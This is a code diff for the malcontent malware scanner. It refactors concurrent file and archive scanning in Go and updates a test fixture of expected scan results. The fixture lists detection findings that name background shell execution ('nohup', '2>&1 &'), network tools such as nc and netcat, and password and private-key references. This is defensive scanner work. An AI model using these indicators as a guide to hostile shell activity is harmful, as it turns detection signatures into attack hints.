match, err := exitIfHitOrMiss(&frMap, path, c.ExitFirstHit, c.ExitFirstMiss) - if err != nil { - matchOnce.Do(func() { - matchChan <- matchResult{fr: match, err: err} - }) - return err - } - } +func processPaths(ctx context.Context, paths []string, scanInfo scanPathInfo, c malcontent.Config, r *malcontent.Report, matchChan chan matchResult, matchOnce *sync.Once, logger *clog.Logger) error { + maxConcurrency := getMaxConcurrency(c.Concurrency) + pc := createPathChannel(paths) - if len(c.TrimPrefixes) > 0 { - path = report.TrimPrefixes(path, c.TrimPrefixes) - } - r.Files.Store(path, fr) - if c.Renderer != nil && r.Diff == nil && fr.RiskScore >= c.MinFileRisk { - if err := c.Renderer.File(ctx, fr); err != nil { - return fmt.Errorf("render: %w", err) + scanCtx, cancel := context.WithCancel(ctx) + defer cancel() + + g := setupErrorGroup(maxConcurrency) + setupMatchHandler(scanCtx, matchChan, c, cancel, logger) + + for path := range pc { + g.Go(func() error { + return processPath(scanCtx, path, scanInfo, c, r, matchChan, matchOnce, logger) + }) + } + + if err := g.Wait(); err != nil { + return handleScanError(matchChan, r, c, err) + } + + if c.OCI { + return handleOCIResults(ctx, scanInfo.imageURI, &r.Files, c, logger) + } + + return nil +} + +func getMaxConcurrency(configured int) int { + if configured < 1 { + return 1 + } + return configured +} + +func createPathChannel(paths []string) chan string { + pc := make(chan string, len(paths)) + for _, path := range paths { + pc <- path + } + close(pc) + return pc +} + +func setupErrorGroup(maxConcurrency int) *errgroup.Group { + g := &errgroup.Group{} + g.SetLimit(maxConcurrency) + return g +} + +func setupMatchHandler(ctx context.Context, matchChan chan matchResult, c malcontent.Config, cancel context.CancelFunc, logger *clog.Logger) { + go func() { + select { + case match := <-matchChan: + if match.fr != nil && c.Renderer != nil && match.fr.RiskScore >= c.MinFileRisk { + if err := c.Renderer.File(ctx, match.fr); err != nil { + logger.Errorf("render error: %v", err) } } - return nil + cancel() + case <-ctx.Done(): + return } + }() +} - scanCtx, cancel := context.WithCancel(ctx) - var g errgroup.Group - g.SetLimit(maxConcurrency) - - // Poll the match channel for the first hit or miss - go func() { - select { - case match := <-matchChan: - if match.fr != nil && c.Renderer != nil && match.fr.RiskScore >= c.MinFileRisk { - if err := c.Renderer.File(ctx, match.fr); err != nil { - logger.Errorf("render error: %v", err) - } - } - cancel() - case <-scanCtx.Done(): - return - } - }() +func processPath(ctx context.Context, path string, scanInfo scanPathInfo, c malcontent.Config, r *malcontent.Report, matchChan chan matchResult, matchOnce *sync.Once, logger *clog.Logger) error { + select { + case <-ctx.Done(): + return ctx.Err() + default: + if programkind.IsSupportedArchive(path) { + return handleArchiveFile(ctx, path, c, r, matchChan, matchOnce, logger) + } + return handleSingleFile(ctx, path, scanInfo, c, r, matchChan, matchOnce, logger) + } +} - for path := range pc { - g.Go(func() error { - select { - case <-scanCtx.Done(): - return scanCtx.Err() - default: - if programkind.IsSupportedArchive(path) { - return handleArchive(path) - } - return handleFile(path) - } +func handleArchiveFile(ctx context.Context, path string, c malcontent.Config, r *malcontent.Report, matchChan chan matchResult, matchOnce *sync.Once, logger *clog.Logger) error { + frs, err := processArchive(ctx, c, c.RuleFS, path, logger) + if err != nil { + logger.Errorf("unable to process %s: %v", path, err) + return err + } + + if !c.OCI && (c.ExitFirstHit || c.ExitFirstMiss) { + match, err := exitIfHitOrMiss(frs, path, c.ExitFirstHit, c.ExitFirstMiss) + if err != nil { + matchOnce.Do(func() { + matchChan <- matchResult{fr: match, err: err} }) + return err } + } - if err := g.Wait(); err != nil { - if c.OCI { - if cleanErr := os.RemoveAll(ociExtractPath); cleanErr != nil { - logger.Errorf("remove %s: %v", scanPath, cleanErr) - } + //nolint:nestif // ignore complexity of 14 + if frs != nil { + frs.Range(func(key, value any) bool { + if key == nil || value == nil { + return true } - - select { - case match := <-matchChan: - r := &malcontent.Report{ - Files: sync.Map{}, - } - if match.fr != nil { + if k, ok := key.(string); ok { + if fr, ok := value.(*malcontent.FileReport); ok { if len(c.TrimPrefixes) > 0 { - match.fr.Path = report.TrimPrefixes(match.fr.Path, c.TrimPrefixes) + k = report.TrimPrefixes(k, c.TrimPrefixes) + } + r.Files.Store(k, fr) + if c.Renderer != nil && r.Diff == nil && fr.RiskScore >= c.MinFileRisk { + if err := c.Renderer.File(ctx, fr); err != nil { + logger.Errorf("render error: %v", err) + } } - r.Files.Store(match.fr.Path, match.fr) } - return r, match.err - default: - return r, err } + return true + }) + } + return nil +} + +func handleSingleFile(ctx context.Context, path string, scanInfo scanPathInfo, c malcontent.Config, r *malcontent.Report, matchChan chan matchResult, matchOnce *sync.Once, logger *clog.Logger) error { + trimPath := "" + if c.OCI { + scanInfo.effectivePath = scanInfo.imageURI + trimPath = scanInfo.ociExtractPath + } + + fr, err := processFile(ctx, c, c.RuleFS, path, scanInfo.effectivePath, trimPath, logger) + if err != nil && c.Renderer.Name() != interactive { + if len(c.TrimPrefixes) > 0 { + path = report.TrimPrefixes(path, c.TrimPrefixes) } + r.Files.Store(path, &malcontent.FileReport{}) + return fmt.Errorf("process: %w", err) + } + if fr == nil { + return nil + } - // OCI images hadle their match his/miss logic per scanPath - if c.OCI { - match, err := exitIfHitOrMiss(&r.Files, imageURI, c.ExitFirstHit, c.ExitFirstMiss) - if err != nil && c.Renderer != nil && match.RiskScore >= c.MinFileRisk { - if match != nil && c.Renderer != nil && match.RiskScore >= c.MinFileRisk { - if renderErr := c.Renderer.File(ctx, match); renderErr != nil { - logger.Errorf("render error: %v", renderErr) - } - } - cancel() - return r, err - } + if !c.OCI && (c.ExitFirstHit || c.ExitFirstMiss) { + var frMap sync.Map + frMap.Store(path, fr) + match, err := exitIfHitOrMiss(&frMap, path, c.ExitFirstHit, c.ExitFirstMiss) + if err != nil { + matchOnce.Do(func() { + matchChan <- matchResult{fr: match, err: err} + }) + return err + } + } + + if len(c.TrimPrefixes) > 0 { + path = report.TrimPrefixes(path, c.TrimPrefixes) + } + r.Files.Store(path, fr) + if c.Renderer != nil && r.Diff == nil && fr.RiskScore >= c.MinFileRisk { + if err := c.Renderer.File(ctx, fr); err != nil { + return fmt.Errorf("render: %w", err) + } + } + return nil +} - if err := os.RemoveAll(ociExtractPath); err != nil { - logger.Errorf("remove %s: %v", scanPath, err) +func handleScanError(matchChan chan matchResult, r *malcontent.Report, c malcontent.Config, err error) error { + select { + case match := <-matchChan: + // Clear existing entries and store only the match result + r.Files = sync.Map{} + if match.fr != nil { + if len(c.TrimPrefixes) > 0 { + match.fr.Path = report.TrimPrefixes(match.fr.Path, c.TrimPrefixes) } + r.Files.Store(match.fr.Path, match.fr) } - cancel() - } // loop: next scan path - return r, nil + return match.err + default: + return err + } +} + +func cleanupOCIPath(path string, logger *clog.Logger) { + if err := os.RemoveAll(path); err != nil { + logger.Errorf("remove %s: %v", path, err) + } +} + +func handleOCIResults(ctx context.Context, imageURI string, files *sync.Map, c malcontent.Config, logger *clog.Logger) error { + match, err := exitIfHitOrMiss(files, imageURI, c.ExitFirstHit, c.ExitFirstMiss) + if err != nil && match != nil && c.Renderer != nil && match.RiskScore >= c.MinFileRisk { + if renderErr := c.Renderer.File(ctx, match); renderErr != nil { + logger.Errorf("render error: %v", renderErr) + } + return err + } + return nil } // processArchive extracts and scans a single archive file. func processArchive(ctx context.Context, c malcontent.Config, rfs []fs.FS, archivePath string, logger *clog.Logger) (*sync.Map, error) { logger = logger.With("archivePath", archivePath) - var err error var frs sync.Map tmpRoot, err := archive.ExtractArchiveToTempDir(ctx, archivePath) @@ -517,16 +536,26 @@ func processArchive(ctx context.Context, c malcontent.Config, rfs []fs.FS, archi return nil, fmt.Errorf("find: %w", err) } - for _, extractedFilePath := range extractedPaths { - fr, err := processFile(ctx, c, rfs, extractedFilePath, archivePath, tmpRoot, logger) - if err != nil { - return nil, err - } - if fr != nil { - // Store a clean reprepsentation of the archive's scanned file to match single file scanning behavior - clean := strings.TrimPrefix(extractedFilePath, tmpRoot) - frs.Store(clean, fr) - } + maxConcurrency := getMaxConcurrency(c.Concurrency) + g := setupErrorGroup(maxConcurrency) + + ep := createPathChannel(extractedPaths) + for path := range ep { + g.Go(func() error { + fr, err := processFile(ctx, c, rfs, path, archivePath, tmpRoot, logger) + if err != nil { + return err + } + if fr != nil { + clean := strings.TrimPrefix(path, tmpRoot) + frs.Store(clean, fr) + } + return nil + }) + } + + if err := g.Wait(); err != nil { + return nil, err } return &frs, nil @@ -537,7 +566,7 @@ func processFile(ctx context.Context, c malcontent.Config, ruleFS []fs.FS, path logger = logger.With("path", path) fr, err := scanSinglePath(ctx, c, path, ruleFS, scanPath, archiveRoot) - if err != nil { + if err != nil && c.Renderer.Name() != interactive { logger.Errorf("scan path: %v", err) return nil, err } @@ -547,7 +576,7 @@ func processFile(ctx context.Context, c malcontent.Config, ruleFS []fs.FS, path return nil, nil } - if fr.Error != "" && c.Renderer.Name() != "Interactive" { + if fr.Error != "" && c.Renderer.Name() != interactive { logger.Errorf("scan error: %s", fr.Error) return nil, fmt.Errorf("report error: %v", fr.Error) } @@ -558,7 +587,7 @@ func processFile(ctx context.Context, c malcontent.Config, ruleFS []fs.FS, path // Scan YARA scans a data source, applying output filters if necessary. func Scan(ctx context.Context, c malcontent.Config) (*malcontent.Report, error) { r, err := recursiveScan(ctx, c) - if err != nil { + if err != nil && c.Renderer.Name() != interactive { return r, err } r.Files.Range(func(key, value any) bool { diff --git a/pkg/action/scan_test.go b/pkg/action/scan_test.go index 0936c285e..291208eaa 100644 --- a/pkg/action/scan_test.go +++ b/pkg/action/scan_test.go @@ -9,11 +9,10 @@ import ( func TestCleanPath(t *testing.T) { tests := []struct { - name string - path string - prefix string - want string - wantErr bool + name string + path string + prefix string + want string }{ { name: "expected behavior", @@ -34,10 +33,9 @@ func TestCleanPath(t *testing.T) { want: "/test.txt", }, { - name: "non-existent path", - path: "does_not_exist/test.txt", - prefix: "temp", - wantErr: true, + name: "non-existent path", + path: "does_not_exist/test.txt", + prefix: "temp", }, { name: "path prefix mismatch", @@ -88,12 +86,8 @@ func TestCleanPath(t *testing.T) { fullPath := filepath.Join(tempDir, tt.path) fullPrefix := filepath.Join(tempDir, tt.prefix) - got, err := cleanPath(fullPath, fullPrefix) - if (err != nil) != tt.wantErr { - t.Errorf("cleanPath() error = %v, wantErr %v", err, tt.wantErr) - return - } - if !tt.wantErr && !strings.HasSuffix(got, tt.want) { + got := cleanPath(fullPath, fullPrefix) + if !strings.HasSuffix(got, tt.want) { t.Errorf("cleanPath() = %v, want suffix %v", got, tt.want) } }) diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 45e3bfcfa..7852c34f6 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -79,7 +79,7 @@ { "Description": "Contains a table that may be used for XOR decryption", "MatchStrings": [ - "56789abcdefghijklmnopqrstuvwxyzABCDE::$ref" + "xor_table::56789abcdefghijklmnopqrstuvwxyzABCDE" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -90,24 +90,24 @@ { "Description": "mentions an IP and port", "MatchStrings": [ - "IP", - "dIp", + "lookupPort", + "parsePort", "getPort", - "hIp", "hasPort", + "rxPort", + "qfIp", + "sfIp", + "dIp", + "hIp", "iIp", "kIp", "lIp", - "lookupPort", "mIp", "oIp", "pIp", - "parsePort", - "qfIp", - "rxPort", - "sfIp", "yIp", - "zIp" + "zIp", + "IP" ], "RiskScore": 2, "RiskLevel": "MEDIUM", @@ -129,19 +129,19 @@ { "Description": "binary contains hardcoded URL", "MatchStrings": [ - "http://localhost", + "https://index.docker.io/v2/library/ubuntu/tags/list", + "https://github.com/spf13/cobra/issues/1279", + "https://github.com/spf13/cobra/issues/1508", + "https://alpinelinux.org/releases.jsondid", + "https://spdx.org/spdxdocs/apko/directory", "http://www.w3.org/XML/1998/namespacexml", "https://GoString01234567beEfFgGvsignal", - "https://alpinelinux.org/releases.jsondid", + "https://pkg.go.dev/text/template", + "https://index.docker.io/v1/Path", "https://github.com/chainguard", "https://github.com/google/go", - "https://github.com/spf13/cobra/issues/1279", - "https://github.com/spf13/cobra/issues/1508", - "https://index.docker.io/v1/Path", - "https://index.docker.io/v2/library/ubuntu/tags/list", - "https://pkg.go.dev/text/template", "https://reproducible", - "https://spdx.org/spdxdocs/apko/directory" + "http://localhost" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -163,12 +163,12 @@ { "Description": "references a specific architecture", "MatchStrings": [ + "https://", + "http://", + "x86_64", "AMD64", "amd64", - "arm64", - "http://", - "https://", - "x86_64" + "arm64" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -179,10 +179,10 @@ { "Description": "references multiple operating systems", "MatchStrings": [ - "Linux", + "https://", "Windows", "http://", - "https://", + "Linux", "macOS" ], "RiskScore": 2, @@ -217,18 +217,18 @@ { "Description": "references a 'password'", "MatchStrings": [ + "bson bytes as Passwordopenpgp", + "and password requiredreading", "IncorrectPasswordError", - "Password from", "PasswordHashIterations", - "UserPassword", - "and password requiredreading", - "bson bytes as Passwordopenpgp", - "passwordSet", - "passwordStdin", + "wpassword-stdinparsing", "socksUsernamePassword", - "stripPassword", "with a password", - "wpassword-stdinparsing" + "Password from", + "passwordStdin", + "stripPassword", + "UserPassword", + "passwordSet" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -239,8 +239,8 @@ { "Description": "References private keys", "MatchStrings": [ - "privateKey", - "private_key" + "private_key", + "privateKey" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -251,8 +251,8 @@ { "Description": "Supports AES (Advanced Encryption Standard)", "MatchStrings": [ - "AES", - "crypto/aes" + "crypto/aes", + "AES" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -274,24 +274,24 @@ { "Description": "decrypts data", "MatchStrings": [ - "DecryptPEMBlock", + "pter type in NewDecrypterPrivateKeyargu", + "lid options for Decrypttags don", "DecryptPKCS1v15SessionK", + "DecrypterreadPythonMult", + "PKCS1v15DecryptOptions", "DecryptPrivateKeys", + "NewOCFBDecrypter", + "DecryptPEMBlock", + "NewCBCDecrypter", + "NewCFBDecrypter", + "DecryptionKeys", "DecryptTicket", "DecrypterOpts", - "DecrypterreadPythonMult", - "DecryptionKeys", "ErrDecryption", - "NewCBCDecrypter", - "NewCFBDecrypter", - "NewOCFBDecrypter", - "PKCS1v15DecryptOptions", "aeadDecrypter", + "ocfbDecrypter", "cbcDecrypter", - "lid options for Decrypttags don", "newDecrypter", - "ocfbDecrypter", - "pter type in NewDecrypterPrivateKeyargu", "rsaDecryptOk" ], "RiskScore": 1, @@ -340,11 +340,11 @@ "Description": "references a 'public key'", "MatchStrings": [ "Public Key", - "PublicKey", "public key", "public-key", - "publicKey", "public_key", + "PublicKey", + "publicKey", "publickey" ], "RiskScore": 1, @@ -356,9 +356,9 @@ { "Description": "tls", "MatchStrings": [ - "TLS13", "TLSVersion", - "crypto/tls" + "crypto/tls", + "TLS13" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -415,7 +415,6 @@ { "Description": "Zstandard: fast real-time compression algorithm", "MatchStrings": [ - "(\ufffd/\ufffd", "zstd" ], "RiskScore": 1, @@ -459,9 +458,6 @@ }, { "Description": "Contains compressed content in ZStandard format", - "MatchStrings": [ - "(\ufffd/\ufffd" - ], "RiskScore": 2, "RiskLevel": "MEDIUM", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-zstd.yara#embedded_zstd", @@ -472,8 +468,8 @@ { "Description": "go asn1", "MatchStrings": [ - "asn1.parse", - "encoding/asn1" + "encoding/asn1", + "asn1.parse" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -732,8 +728,8 @@ { "Description": "Looks up the HOME directory for the current user", "MatchStrings": [ - "HOME", - "getenv" + "getenv", + "HOME" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -745,9 +741,9 @@ { "Description": "Looks up the USER name of the current user", "MatchStrings": [ - "USER", "environ", - "getenv" + "getenv", + "USER" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -805,58 +801,58 @@ { "Description": "references a 'plugin'", "MatchStrings": [ - "ErrIntOverflowPlugin", + "both a container spec and a plugin spec in", + "denied while installing plugin", + "_pingOSTypepluginsecret", "ErrInvalidLengthPlugin", - "PluginConfigArgs", "PluginConfigInterface", - "PluginConfigLinux", - "PluginConfigNetwork", - "PluginConfigRootfs", - "PluginConfigUser", - "PluginCreateOptions", - "PluginDescription", - "PluginDevice", + "ErrIntOverflowPlugin", "PluginDisableOptions", - "PluginEnableOptions", - "PluginEnv", "PluginInspectWithRaw", "PluginInstallOptions", + "fileDescriptorPlugin", + "PluginConfigNetwork", + "PluginCreateOptions", + "PluginEnableOptions", "PluginInterfaceType", - "PluginList", - "PluginMount", - "PluginName", + "PluginRemoveOptions", + "PluginsListResponse", + "PluginConfigRootfs", + "encodeVarintPlugin", + "PluginConfigLinux", + "PluginDescription", + "PluginConfigArgs", + "PluginConfigUser", "PluginPrivileges", - "PluginPush", + "plugin_responses", + "tryPluginUpgrade", "PluginReference", - "PluginRemoveOptions", - "PluginSettings", "PluginSpecwrong", - "PluginsFormat", - "PluginsInfo", - "PluginsListResponse", "SetPluginConfig", - "_pingOSTypepluginsecret", - "both a container spec and a plugin spec in", - "denied while installing plugin", - "encodeVarintPlugin", - "fileDescriptorPlugin", - "plugin_create", + "PluginSettings", "plugin_disable", - "plugin_enable", "plugin_inspect", "plugin_install", + "plugin_upgrade", + "PluginsFormat", + "plugin_create", + "plugin_enable", + "plugin_remove", + "pluginsFormat", + "tryPluginPull", + "PluginDevice", + "PluginMount", + "PluginsInfo", "plugin_list", "plugin_push", - "plugin_remove", - "plugin_responses", + "PluginList", + "PluginName", + "PluginPush", "plugin_set", - "plugin_upgrade", "pluginpath", - "pluginsFormat", "skipPlugin", - "sovPlugin", - "tryPluginPull", - "tryPluginUpgrade" + "PluginEnv", + "sovPlugin" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -879,9 +875,9 @@ { "Description": "calls sleep and runs shell code in the background", "MatchStrings": [ - "#!", "2\u003e\u00261 \u0026", - "nohup" + "nohup", + "#!" ], "RiskScore": 2, "RiskLevel": "MEDIUM", @@ -1018,8 +1014,8 @@ { "Description": "reads files", "MatchStrings": [ - "ReadFile", - "os.(*File).Read" + "os.(*File).Read", + "ReadFile" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1052,8 +1048,8 @@ { "Description": "forcibly synchronizes file state to disk", "MatchStrings": [ - "fsync", - "syscall.Fsync" + "syscall.Fsync", + "fsync" ], "RiskScore": 0, "RiskLevel": "NONE", @@ -1077,11 +1073,11 @@ "Description": "writes to file", "MatchStrings": [ "AllowOverwriteDirWithFile", - "WriteFile", "writeFilePatchHeader", "writeIndexToFile", "writeOneFile", - "writeRawFile" + "writeRawFile", + "WriteFile" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1126,8 +1122,8 @@ { "Description": "mounts file systems", "MatchStrings": [ - "-o", - "mount" + "mount", + "-o" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1172,35 +1168,35 @@ { "Description": "path reference within /etc", "MatchStrings": [ - "/etc/apache/mime.typeshpack", - "/etc/apk/keys/etc/apk/archcached", - "/etc/apk/lib/apk", "/etc/apk/repositories/lib/apk/db/inst", - "/etc/apk/world", - "/etc/bash", "/etc/busybox-paths.d/usr/bin/setkeyco", - "/etc/default/motd-newsformat", - "/etc/group", + "/etc/pki/ca-trust/extracted/pem/tls-c", + "/etc/services/etc/apk/keys/etc/apk/ar", + "/etc/ssl/certs/ca-certificates.crttim", + "/etc/pki/tls/certs/ca-bundle.crtx", + "/etc/apk/keys/etc/apk/archcached", "/etc/hostsgetsockoptnetlinkrib", "/etc/httpd/conf/mime.typesmime", - "/etc/mime.types", - "/etc/nsswitch.confinvalid", - "/etc/os-release", - "/etc/passwdparse", - "/etc/pki/ca-trust/extracted/pem/tls-c", "/etc/pki/tls/cacert.peminvalid", - "/etc/pki/tls/certs/ca-bundle.crtx", + "/etc/default/motd-newsformat", "/etc/pki/tls/certsunexpected", + "/etc/apache/mime.typeshpack", + "/etc/nsswitch.confinvalid", + "/etc/ssl/cert.peminvalid", + "/etc/ssl/ca-bundle.pemx", + "/etc/security/cacertsx", "/etc/protocolsunknown", "/etc/resolv.confnon-", - "/etc/security/cacertsx", - "/etc/services/etc/apk/keys/etc/apk/ar", - "/etc/ssh/ssh", - "/etc/ssl/ca-bundle.pemx", - "/etc/ssl/cert.peminvalid", - "/etc/ssl/certs/ca-certificates.crttim", + "/etc/zoneinfoparsing", "/etc/ssl/certsbad", - "/etc/zoneinfoparsing" + "/etc/apk/lib/apk", + "/etc/passwdparse", + "/etc/mime.types", + "/etc/os-release", + "/etc/apk/world", + "/etc/ssh/ssh", + "/etc/group", + "/etc/bash" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1278,175 +1274,175 @@ { "Description": "path reference within /usr/bin", "MatchStrings": [ - "/usr/bin/ar", - "/usr/bin/ascii", - "/usr/bin/awk", - "/usr/bin/basename", - "/usr/bin/bc", - "/usr/bin/beep", + "/usr/bin/tsortVERSION_ID", + "/usr/bin/setkeycodes", + "/usr/bin/traceroute6", "/usr/bin/blkdiscard", + "/usr/bin/dumpleases", + "/usr/bin/ssl_client", + "/usr/bin/deallocvt", + "/usr/bin/envuidgid", + "/usr/bin/fallocate", + "/usr/bin/fgconsole", + "/usr/bin/setuidgid", + "/usr/bin/sha256sum", + "/usr/bin/sha512sum", + "/usr/bin/softlimit", + "/usr/bin/basename", + "/usr/bin/dos2unix", + "/usr/bin/dpkg-deb", + "/usr/bin/microcom", + "/usr/bin/mkpasswd", + "/usr/bin/nslookup", + "/usr/bin/readlink", + "/usr/bin/realpath", + "/usr/bin/rpm2cpio", + "/usr/bin/runsvdir", + "/usr/bin/setfattr", + "/usr/bin/truncate", + "/usr/bin/unexpand", + "/usr/bin/unix2dos", + "/usr/bin/uudecode", + "/usr/bin/uuencode", "/usr/bin/bunzip2", - "/usr/bin/bzcat", - "/usr/bin/bzip2", - "/usr/bin/cal", - "/usr/bin/chcon", - "/usr/bin/chpst", - "/usr/bin/chrt", - "/usr/bin/chvt", - "/usr/bin/cksum", - "/usr/bin/clear", - "/usr/bin/cmp", - "/usr/bin/comm", - "/usr/bin/crc32", "/usr/bin/crontab", "/usr/bin/cryptpw", - "/usr/bin/cut", - "/usr/bin/dc", - "/usr/bin/deallocvt", - "/usr/bin/diff", "/usr/bin/dirname", - "/usr/bin/dos2unix", - "/usr/bin/dpkg-deb", - "/usr/bin/dumpleases", - "/usr/bin/eject", + "/usr/bin/hexdump", + "/usr/bin/hexedit", + "/usr/bin/install", + "/usr/bin/killall", + "/usr/bin/logname", + "/usr/bin/lzopcat", + "/usr/bin/nsenter", + "/usr/bin/sha1sum", + "/usr/bin/sha3sum", + "/usr/bin/showkey", + "/usr/bin/smemcap", + "/usr/bin/strings", + "/usr/bin/taskset", + "/usr/bin/timeout", + "/usr/bin/ttysize", + "/usr/bin/udhcpc6", + "/usr/bin/unshare", + "/usr/bin/volname", "/usr/bin/envdir", - "/usr/bin/envuidgid", "/usr/bin/expand", - "/usr/bin/expr", "/usr/bin/factor", - "/usr/bin/fallocate", - "/usr/bin/fgconsole", - "/usr/bin/find", - "/usr/bin/flock", - "/usr/bin/fold", - "/usr/bin/free", "/usr/bin/ftpget", "/usr/bin/ftpput", - "/usr/bin/fuser", "/usr/bin/groups", - "/usr/bin/hd", - "/usr/bin/head", - "/usr/bin/hexdump", - "/usr/bin/hexedit", "/usr/bin/hostid", - "/usr/bin/id", - "/usr/bin/install", - "/usr/bin/ipcrm", - "/usr/bin/ipcs", - "/usr/bin/killall", - "/usr/bin/last", - "/usr/bin/less", "/usr/bin/logger", - "/usr/bin/logname", - "/usr/bin/lpq", - "/usr/bin/lpr", - "/usr/bin/lsof", - "/usr/bin/lspci", "/usr/bin/lsscsi", - "/usr/bin/lsusb", - "/usr/bin/lzcat", - "/usr/bin/lzma", - "/usr/bin/lzopcat", - "/usr/bin/man", "/usr/bin/md5sum", - "/usr/bin/mesg", - "/usr/bin/microcom", "/usr/bin/mkfifo", - "/usr/bin/mkpasswd", - "/usr/bin/nc", "/usr/bin/netcat", - "/usr/bin/nl", "/usr/bin/nmeter", - "/usr/bin/nohup", - "/usr/bin/nproc", - "/usr/bin/nsenter", - "/usr/bin/nslookup", - "/usr/bin/od", "/usr/bin/openvt", "/usr/bin/passwd", - "/usr/bin/paste", - "/usr/bin/patch", - "/usr/bin/pgrep", - "/usr/bin/pkill", - "/usr/bin/pmap", "/usr/bin/printf", - "/usr/bin/pscan", "/usr/bin/pstree", - "/usr/bin/pwdx", - "/usr/bin/readlink", - "/usr/bin/realpath", "/usr/bin/renice", - "/usr/bin/reset", "/usr/bin/resize", - "/usr/bin/rpm2cpio", "/usr/bin/runcon", - "/usr/bin/runsvdir", - "/usr/bin/rx", "/usr/bin/script", - "/usr/bin/seq", - "/usr/bin/setfattr", - "/usr/bin/setkeycodes", "/usr/bin/setsid", - "/usr/bin/setuidgid", - "/usr/bin/sha1sum", - "/usr/bin/sha256sum", - "/usr/bin/sha3sum", - "/usr/bin/sha512sum", - "/usr/bin/showkey", + "/usr/bin/tcpsvd", + "/usr/bin/telnet", + "/usr/bin/udpsvd", + "/usr/bin/unlink", + "/usr/bin/unlzma", + "/usr/bin/unlzop", + "/usr/bin/uptime", + "/usr/bin/whoami", + "/usr/bin/ascii", + "/usr/bin/bzcat", + "/usr/bin/bzip2", + "/usr/bin/chcon", + "/usr/bin/chpst", + "/usr/bin/cksum", + "/usr/bin/clear", + "/usr/bin/crc32", + "/usr/bin/eject", + "/usr/bin/flock", + "/usr/bin/fuser", + "/usr/bin/ipcrm", + "/usr/bin/lspci", + "/usr/bin/lsusb", + "/usr/bin/lzcat", + "/usr/bin/nohup", + "/usr/bin/nproc", + "/usr/bin/paste", + "/usr/bin/patch", + "/usr/bin/pgrep", + "/usr/bin/pkill", + "/usr/bin/pscan", + "/usr/bin/reset", "/usr/bin/shred", + "/usr/bin/split", + "/usr/bin/unzip", + "/usr/bin/users", + "/usr/bin/vlock", + "/usr/bin/which", + "/usr/bin/whois", + "/usr/bin/xargs", + "/usr/bin/xzcat", + "/usr/bin/beep", + "/usr/bin/chrt", + "/usr/bin/chvt", + "/usr/bin/comm", + "/usr/bin/diff", + "/usr/bin/expr", + "/usr/bin/find", + "/usr/bin/fold", + "/usr/bin/free", + "/usr/bin/head", + "/usr/bin/ipcs", + "/usr/bin/last", + "/usr/bin/less", + "/usr/bin/lsof", + "/usr/bin/lzma", + "/usr/bin/mesg", + "/usr/bin/pmap", + "/usr/bin/pwdx", "/usr/bin/shuf", - "/usr/bin/smemcap", - "/usr/bin/softlimit", "/usr/bin/sort", - "/usr/bin/split", - "/usr/bin/ssl_client", - "/usr/bin/strings", - "/usr/bin/sum", - "/usr/bin/svc", "/usr/bin/svok", - "/usr/bin/tac", "/usr/bin/tail", - "/usr/bin/taskset", - "/usr/bin/tcpsvd", - "/usr/bin/tee", - "/usr/bin/telnet", "/usr/bin/test", "/usr/bin/tftp", - "/usr/bin/timeout", - "/usr/bin/top", - "/usr/bin/traceroute6", "/usr/bin/tree", - "/usr/bin/truncate", - "/usr/bin/tsortVERSION_ID", - "/usr/bin/ttysize", - "/usr/bin/udhcpc6", - "/usr/bin/udpsvd", - "/usr/bin/unexpand", "/usr/bin/uniq", "/usr/bin/unit", - "/usr/bin/unix2dos", - "/usr/bin/unlink", - "/usr/bin/unlzma", - "/usr/bin/unlzop", - "/usr/bin/unshare", "/usr/bin/unxz", - "/usr/bin/unzip", - "/usr/bin/uptime", - "/usr/bin/users", - "/usr/bin/uudecode", - "/usr/bin/uuencode", - "/usr/bin/vlock", - "/usr/bin/volname", "/usr/bin/wall", - "/usr/bin/wc", "/usr/bin/wget", - "/usr/bin/which", - "/usr/bin/whoami", - "/usr/bin/whois", - "/usr/bin/xargs", + "/usr/bin/awk", + "/usr/bin/cal", + "/usr/bin/cmp", + "/usr/bin/cut", + "/usr/bin/lpq", + "/usr/bin/lpr", + "/usr/bin/man", + "/usr/bin/seq", + "/usr/bin/sum", + "/usr/bin/svc", + "/usr/bin/tac", + "/usr/bin/tee", + "/usr/bin/top", "/usr/bin/xxd", - "/usr/bin/xzcat", - "/usr/bin/yes" + "/usr/bin/yes", + "/usr/bin/ar", + "/usr/bin/bc", + "/usr/bin/dc", + "/usr/bin/hd", + "/usr/bin/id", + "/usr/bin/nc", + "/usr/bin/nl", + "/usr/bin/od", + "/usr/bin/rx", + "/usr/bin/wc" ], "RiskScore": 1, "RiskLevel": "LOW", @@ -1485,7 +1481,6 @@ "/usr/sbin/fakeidentd/usr/sbin/flash_lock/usr/sbin/getenforce/usr/sbin/nbd-", "/usr/sbin/fbset/usr/sbin/httpd/usr/sbin/inetd/usr/sbin/rdate/usr/sbin/tftp", "/usr/sbin/fdformat/usr/sbin/fsfreeze/usr/sbin/killall5/usr/sbin/loadfont/u", - "/usr/sbin/flash_eraseall/usr/sbin/selinuxenabledskipping", "/usr/sbin/flash_lock/usr/sbin/getenforce/usr/sbin/nbd-client/usr/sbin/popm", "/usr/sbin/flash_unlock/usr/sbin/matchpathcon/usr/sbin/remove-shell/usr/sbi", "/usr/sbin/flashcp/usr/sbin/i2cdump/usr/sbin/ifplugd/usr/sbin/nologin/usr/s", @@ -1493,16 +1488,12 @@ "/usr/sbin/ftpd/usr/sbin/ntpd/usr/sbin/rdev/usr/bin/ascii/usr/bin/crc32/usr", "/usr/sbin/getenforce/usr/sbin/nbd-client/usr/sbin/popmaildir/usr/sbin/sete", "/usr/sbin/getsebool/usr/sbin/i2cdetect/usr/sbin/nandwrite/usr/sbin/partpro", - 